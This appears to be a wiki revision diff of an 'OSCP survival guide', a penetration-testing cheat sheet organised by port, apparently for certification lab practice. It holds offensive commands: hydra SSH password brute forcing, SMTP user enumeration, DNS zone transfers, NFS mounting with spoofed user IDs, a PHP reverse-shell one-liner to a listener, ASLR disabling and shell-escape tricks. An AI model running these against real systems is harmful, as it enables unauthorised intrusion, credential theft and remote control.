Outils d'utilisateurs
oscp_survival_guide
Différences
Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
|
oscp_survival_guide [2021/02/06 21:31] M0N5T3R |
oscp_survival_guide [2021/02/06 22:47] (Version actuelle) M0N5T3R |
||
|---|---|---|---|
| Ligne 2721: | Ligne 2721: | ||
| - | ====== EDIT: Useful and fast exploit : ====== | + | ====== EDIT: Useful and fast exploit - Cheat sheet : ====== |
| + | |||
| + | **Port 22 - SSH** | ||
| + | <code> | ||
| + | hydra -l $USERNAME -P /usr/share/wordlists/wfuzz/others/common_pass.txt ssh://$RHOST | ||
| + | </code> | ||
| + | |||
| + | |||
| + | **Port 25 - SMTP ** | ||
| + | <code> | ||
| + | nc 10.11.1.217 25 | ||
| + | [...] | ||
| + | VRFY root | ||
| + | 252 2.0.0 root | ||
| + | </code> | ||
| + | |||
| + | |||
| + | |||
| + | **Port 53 - DNS** | ||
| + | <code> | ||
| + | dig axfr @$RHOST DOMAIN.COM | ||
| + | dnsrecon -d DOMAIN.COM | ||
| + | </code> | ||
| Ligne 2755: | Ligne 2778: | ||
| **Port 111 - Rpcbind** | **Port 111 - Rpcbind** | ||
| - | <code>rpcinfo -p 10.11.1.111 | + | <code> |
| + | nmap -sV -p 111 --script=rpcinfo $RHOST | ||
| + | nmap -p 111 --script nfs* $RHOST | ||
| + | mount -t nfs -o vers=3 $RHOST:/SHARENAME /mnt | ||
| + | groupadd --gid 1337 pwn | ||
| + | useradd --uid 1337 -g pwn pwn | ||
| + | |||
| + | |||
| + | |||
| + | rpcinfo -p 10.11.1.111 | ||
| rpcclient -U "" 10.11.1.111 | rpcclient -U "" 10.11.1.111 | ||
| srvinfo | srvinfo | ||
| Ligne 2771: | Ligne 2803: | ||
| </code> | </code> | ||
| + | |||
| + | **Port 161 - SNMP** | ||
| + | <code>snmp-check $RHOST | ||
| + | onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $RHOST | ||
| + | snmpwalk -v1 -c public $RHOST | ||
| + | nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes $IP | ||
| + | nmap -sU -p 161 --script /usr/share/nmap/scripts/snmp-win32-users.nse $IP | ||
| + | </code> | ||
| **Port 139/445 - SMB** | **Port 139/445 - SMB** | ||
| Ligne 2885: | Ligne 2925: | ||
| - | **LDAP - 389,636** | + | **Port 389,636 - LDAP ** |
| <code>ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com" | <code>ldapsearch -h 10.11.1.111 -p 389 -x -b "dc=mywebsite,dc=com" | ||
| ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password' | ldapsearch -x -h 10.11.1.111 -D 'DOMAIN\user' -w 'hash-password' | ||
| Ligne 2892: | Ligne 2932: | ||
| </code> | </code> | ||
| - | **HTTPS - 443** | + | **Port 443 - HTTPS** |
| <code>Read the actual SSL CERT to: | <code>Read the actual SSL CERT to: | ||
| find out potential correct vhost to GET | find out potential correct vhost to GET | ||
| Ligne 2901: | Ligne 2941: | ||
| nmap -sV --script=ssl-heartbleed 10.1.10.111 | nmap -sV --script=ssl-heartbleed 10.1.10.111 | ||
| mod_ssl,OpenSSL version Openfuck | mod_ssl,OpenSSL version Openfuck | ||
| - | <code> | + | </code> |
| - | **500 - ISAKMP IKE** | + | |
| + | **Port 500 - ISAKMP IKE** | ||
| <code>ike-scan 10.11.1.111</code> | <code>ike-scan 10.11.1.111</code> | ||
| - | **513 - Rlogin** | + | **Port 513 - Rlogin** |
| <code>apt install rsh-client | <code>apt install rsh-client | ||
| rlogin -l root 10.11.1.111 | rlogin -l root 10.11.1.111 | ||
| </code> | </code> | ||
| - | **541 - FortiNet SSLVPN** | + | **Port 541 - FortiNet SSLVPN** |
| <code>https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/ | <code>https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/ | ||
| </code> | </code> | ||
| - | **1433 - MSSQL** | + | **Port 1433 - MSSQL** |
| <code>nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111 | <code>nmap -p 1433 -sU --script=ms-sql-info.nse 10.11.1.111 | ||
| use auxiliary/scanner/mssql/mssql_ping | use auxiliary/scanner/mssql/mssql_ping | ||
| Ligne 2948: | Ligne 2989: | ||
| mount -t 10.11.1.111:/ /tmp/NFS | mount -t 10.11.1.111:/ /tmp/NFS | ||
| </code> | </code> | ||
| + | |||
| + | |||
| **Port 2100 - Oracle XML DB** | **Port 2100 - Oracle XML DB** | ||
| <code>Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm | <code>Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm | ||
| </code> | </code> | ||
| + | |||
| + | |||
| **Port 3306 - MySQL** | **Port 3306 - MySQL** | ||
| <code>nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306 | <code>nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse 10.11.1.111 -p 3306 | ||
| Ligne 2957: | Ligne 3002: | ||
| https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/ | https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/ | ||
| </code> | </code> | ||
| + | |||
| + | |||
| **Port 3389 - RDP** | **Port 3389 - RDP** | ||
| <code> | <code> | ||
| Ligne 2980: | Ligne 3027: | ||
| - | **WinRM - 5985** | + | **Port 5985 - WinRM ** |
| <code>https://github.com/Hackplayers/evil-winrm | <code>https://github.com/Hackplayers/evil-winrm | ||
| gem install evil-winrm | gem install evil-winrm | ||
| Ligne 2989: | Ligne 3036: | ||
| - | **Redis - 6379** | + | **Port 6379 - Redis ** |
| <code>https://github.com/Avinash-acid/Redis-Server-Exploit | <code>https://github.com/Avinash-acid/Redis-Server-Exploit | ||
| python redis.py 10.10.10.160 redis | python redis.py 10.10.10.160 redis | ||
| Ligne 2995: | Ligne 3042: | ||
| - | **MsDeploy - 8172** | + | **Port 8172 - MsDeploy ** |
| <code>Microsoft IIS Deploy port | <code>Microsoft IIS Deploy port | ||
| IP:8172/msdeploy.axd | IP:8172/msdeploy.axd | ||
| Ligne 3241: | Ligne 3288: | ||
| # PHP most simple Linux | # PHP most simple Linux | ||
| <?php $sock = fsockopen("10.11.1.111",1234); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?> | <?php $sock = fsockopen("10.11.1.111",1234); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);?> | ||
| + | </code> | ||
| + | |||
| + | |||
| + | |||
| + | |||
| + | **Disable ASLR on linux machine** | ||
| + | <code> | ||
| + | echo 0 > /proc/sys/kernel/randomize_va_space | ||
| + | </code> | ||
| + | |||
| + | |||
| + | |||
| + | |||
| + | **Get full shell on jail shelle** | ||
| + | <code> | ||
| + | python -c “import pty;pty.spawn(‘/bin/sh’);” | ||
| + | echo ‘os.system(‘/bin/bash’)’ | ||
| + | perl -e ‘exec “/bin/sh”;’ | ||
| </code> | </code> | ||
| Ligne 3259: | Ligne 3324: | ||
| - | ** note template** | + | **Note template** |
| <code> | <code> | ||
| To work fast use CherryTree to take notes and use this template : | To work fast use CherryTree to take notes and use this template : | ||
oscp_survival_guide.1612643512.txt.gz · Dernière modification: 2021/02/06 21:31 par M0N5T3R
Outils de la Page
Sauf mention contraire, le contenu de ce wiki est placé sous la licence suivante : CC Attribution-Share Alike 3.0 Unported
